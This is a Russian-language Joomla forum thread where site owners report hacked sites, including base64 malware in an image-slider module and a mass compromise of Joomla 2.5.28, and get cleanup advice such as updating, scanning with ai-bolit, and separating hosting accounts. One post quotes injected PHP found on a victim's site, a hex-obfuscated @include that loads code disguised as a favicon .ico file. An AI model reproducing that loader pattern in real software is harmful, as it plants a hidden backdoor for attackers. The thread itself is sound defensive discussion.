0 Пользователей и 1 Гость просматривают эту тему.
  • 678 Ответов
  • 243989 Просмотров
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
А сколько всего сайтов у вас? Если много - они на одном хостинг аккаунте? Какая версия Joomla? Скорее всего надо обновить все до последней версии и удалить вредоносный код. Сканер айболит неплохо справляется с поиском такого кода. Ну и менять пароли. Я на днях тему обновлю. Давно не занимался.
*

stepan39

  • Захожу иногда
  • 497
  • 27 / 0
EyeSite просигналил:
Новые файлы, всего непринятых изменений: 3
/modules/mod_ariimageslider/_mod_ariimageslider.xml
/modules/mod_ariimageslider/mod_ariimageslider.php
/modules/mod_ariimageslider/mod_ariimageslider.xml

Глядим. Установлен модуль (виден в менеджере расширений). В коде mod_ariimageslider.php зловред в bace64.

Смотрим логи:
Спойлер
[свернуть]

Joomla 2.5.28 с заплатками. JoomShopping 3.20.2, много чего...

Где копнуть?
*

ice99

  • Захожу иногда
  • 85
  • 3 / 0
Скачал Admin tools 4.0.1 с офсайта. Там почему-то нет кнопки "Права на папки". Неужели и это урезали в пользу платной версии?
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Скачал Admin tools 4.0.1 с офсайта...
Я ни в коем случае не хочу вас переубеждать, но давайте подумаем вот над каким вопросом. К примеру, я нахожу на вашем сайте уязвимость. Я больше, чем уверен, что она есть. Будь это SQL-Ingect, XSS, просто бекдор в скриптах или что то еще, не важно. Даже если вот прямо сейчас ее нет, у вас самая последняя версия Joomla, самые свежие расширения, все грамотно настроено и дышит в ладан...через какое то время все равно что то отыщется. Теперь вопрос: имея доступ на запись каким образом мне может помешать CHMOD, если я сам простой php-командой могу его устанавливать? На мой взгляд, данное расширение может помочь только от ламера, который, набрав адрес админки и не увидив ее, считает сайт суперкрутозащищенным. Но на деле обычная basic-авторизация оказывается эффективнее, т.к. в этом случае доступ контролируется сервером, а не скриптом. Кроме того, компонент довольно старый...из этого тоже можно сделать какие то выводы...
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Скачал Admin tools 4.0.1 с офсайта. Там почему-то нет кнопки "Права на папки". Неужели и это урезали в пользу платной версии?

Все есть. У меня ничего не пропало. Скоро обновлю тему нормально. Сделаю пару статей доступных для понимания обычного пользователя.
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
А сколько всего сайтов у вас? Если много - они на одном хостинг аккаунте? Какая версия Joomla? Скорее всего надо обновить все до последней версии и удалить вредоносный код. Сканер айболит неплохо справляется с поиском такого кода. Ну и менять пароли. Я на днях тему обновлю. Давно не занимался.

У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются, хостеры утверждают что это Joomla дырявая, но последний раз в пустую папку только что созданного пользователя добавились файлы, подскажите, что можно сделать чтоб один раз и навсегда решить проблему, а то регулярно чистить от заразы и менять пароли устал...
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
1. у вас на данный момент 1094 сообщения на форуме. вы до сих пор не знаете, что не нужно одно и тоже писать в 100500 темах?
2. мой вам совет - обратитесь к специалистам в этом вопросе в ком разделе. вы не справитесь сами с этой проблемой.

P.S. пароли кстати можете не менять, толку от этого 0
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

nick71

  • Завсегдатай
  • 1145
  • 12 / 12
  • Сайты любой сложности - обращайтесь
1. у вас на данный момент 1094 сообщения на форуме. вы до сих пор не знаете, что не нужно одно и тоже писать в 100500 темах?
2. мой вам совет - обратитесь к специалистам в этом вопросе в ком разделе. вы не справитесь сами с этой проблемой.

P.S. пароли кстати можете не менять, толку от этого 0
Спасибо. По п.1  - мои извинения - запаниковал :)
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются...
Вы сами на свой вопрос ответили. Не держи яйца в одной корзине - старая народная мудрость!
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
У меня на хостинге все сайты, примерно 20 штук, на одном аккаунте, и постоянно заражаются, хостеры утверждают что это Joomla дырявая, но последний раз в пустую папку только что созданного пользователя добавились файлы, подскажите, что можно сделать чтоб один раз и навсегда решить проблему, а то регулярно чистить от заразы и менять пароли устал...
Первое что надо выполнить это разграничение прав по пользователям, что хостинг редко позволяет сделать, тут уж или брать vps и настраивать или один сайт=одному акуанту хостинга.
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
Добрый день, не знаю куда писать, прошу помощи. Создал сайт год назад, поставил защиту скрывать админку ( слово пароль) теперь сайт понадобился но слово забыл, не могу зайти в админку, подскажите как можно зайти. Сайт на компе.
*

dmitry_stas

  • Легенда
  • 13151
  • 1234 / 8
Добрый день, не знаю куда писать
само собой в первую попавшуюся тему :)

поставил защиту скрывать админку ( слово пароль)
какую из?
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
поставил защиту скрывать админку ( слово пароль) теперь сайт понадобился но слово забыл, не могу зайти в админку, подскажите как можно зайти.

Отключите плагин который закрывает админку в phpMyAdmin. Какой плагин - вам виднее. Только именно его, а не все.

http://joomlaforum.ru/index.php?topic=195334.0
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
попробовал выдает ошибка #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UPDATEbak_tzbq3__extensions SET enabled = 0 WHERE name LIKE '%jlsecure%' AND typ' at line 1
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Попробуйте просто зайти в нужную таблицу и запись и поставить в enabled 0
*

НИК2016

  • Новичок
  • 5
  • 0 / 0
а как узнать нужную таблицу? и как в ней изменить?  я не силен в этом если можно поподробнее, спасибо.
*

SeBun

  • BanMaster
  • 4018
  • 259 / 5
  • @SeBun48
Вот решение на примере плагина JSequre. Ну и дальше эту тему почитайте...
Оказываю услуги по Joomla | Миграция/Обновление | Сопровождение | IT-аутсорсинг | Недорогие домены и хостинг
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Может кому будет полезно, логи атак на меня, боты гуляют:

Спойлер
[свернуть]
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Как всегда что попало сканят.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Как всегда что попало сканят.
И как всегда, где попало, но находят)
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Похоже был массовый взлом джумла 2.5.28. Вряд ли у них патчи стояли, но сейчас много сайтов с 500 ошибкой на форуме на это версии джумла появилось. Так что предупреждаем владельцев сайтов на это версии.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Может кому интересно будет лог атак за октябрь, такое впечатление что в основном скрипткидесы долбились)))

*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
@wishlight, первый пост поломался

Освобожусь, все переделаю. Его давно пора обновить.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Обновил весь первый пост. Жду предложений о том, что можно туда добавить. Еще могу сделать и выложить русский для EasyCalcCheck Plus кому лень переводить.  Его более-менее качественного в паблике я не видел.
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
я бы вот это добавил.

Добавил. Серверные решения правда проще.
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Версия 2.5.28

Спойлер
[свернуть]

Файлы удалил, появляются снова, меняются CHMOD на файлы index.php  как исправить?
В некоторых создаваемых файлах есть во  такое содержимое
Код
/*d2afa*/

@include "\x2fhome\x2fuser\x73/v/v\x6casno\x7653/d\x6fmain\x73/eas\x79vn.r\x75/ass\x65ts/e\x78port\x2fotdy\x69x-v-\x6bryim\x75/fav\x69con_\x652616\x66.ico";

/*d2afa*/


echo file_get_contents('index.html.bak.bak');
« Последнее редактирование: 14.02.2018, 15:59:24 от Vlasnov »
*

wishlight

  • Живу я здесь
  • 4980
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
Версия 2.5.28

Файлы удалил, появляются снова, меняются CHMOD на файлы index.php  как исправить?
Если сайт не один на хостинге, то отделить этот сайт от других. Установить патч из темы, обновить расширения по возможности до последних версий для 2.5.28. Сменить все пароли, и удалить вредоносный код. Можно с помощью скрипта ai-bolit, но еще нужно понимать что удаляете.
*

Vlasnov

  • Осваиваюсь на форуме
  • 14
  • 0 / 0
Если сайт не один на хостинге, то отделить этот сайт от других. Установить патч из темы, обновить расширения по возможности до последних версий для 2.5.28. Сменить все пароли, и удалить вредоносный код. Можно с помощью скрипта ai-bolit, но еще нужно понимать что удаляете.
айболит не получается запустить даже под виндой, хотя все обновления установлены. Патч из первого поста?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 328
Последний ответ 31.03.2024, 16:14:32
от SeBun
Скрипты защиты Joomla 4

Автор mister_boy

Ответов: 6
Просмотров: 1150
Последний ответ 16.05.2023, 16:38:58
от mister_boy
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1297
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 483
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1080
Последний ответ 03.11.2020, 17:36:03
от Cedars